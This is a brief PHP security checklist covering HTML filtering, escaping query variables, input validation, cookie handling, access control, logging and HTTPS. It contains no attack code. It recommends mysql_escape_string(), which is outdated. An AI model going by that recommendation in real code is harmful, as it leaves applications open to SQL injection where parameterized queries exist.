PHP security rules
Please refer to the Product Safety Checklist.
Input and output
Check whether HTML code filtering is done
Possible problems: If someone enters malicious HTML code, it will lead to stealing cookies, generating malicious login forms, and damaging the website
Check whether the variable has been escaped before performing database operations
Possible problems: If a string variable to be written into a query statement contains certain special characters, such as quotation marks (',") or semicolon ( ;) It may cause unexpected operations to be performed.
Recommended method: use mysql_escape_string() or a function that implements similar functions.
Check the legality of the input value
Possible problems: Abnormal Values can cause problems. Failure to check the entered values will result in illegal or erroneous data being stored in UDB, other databases, or unexpected program operations.
Example:
If The program uses the parameter value entered by the user as the file name to perform file operations. Malicious input of the system file name will cause system damage.
Verify the use of cookies and the processing of user data
Possible problems: Incorrect The use of cookies may cause user data leakage
Access control
For products used internally or products used by partners, consider adding access control
logs
Ensure that users’ confidential information is not recorded in the log (for example: user's password)
Ensure that complete user access records are saved for key user operations
https
Use https
